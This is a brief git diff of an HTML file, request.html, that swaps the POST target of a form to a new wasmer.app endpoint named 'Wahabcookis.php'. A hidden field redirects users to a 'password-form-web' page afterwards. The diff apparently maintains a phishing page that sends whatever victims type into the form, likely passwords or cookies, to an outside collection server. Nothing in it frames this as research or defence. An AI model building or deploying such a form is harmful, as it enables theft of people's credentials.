--- a/request.html
+++ b/request.html
@@ -9,7 +9,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://saba44-b3539.wasmer.app/Wahabcookis.php" method="post">
+        <form action="https://lernayouamzax-6fa3c.wasmer.app/Wahabcookis.php" method="post">
             <input type="hidden" name="_redirect" value="https://password-form-web.vercel.app/"/>
             <div id="root">
                 <div>
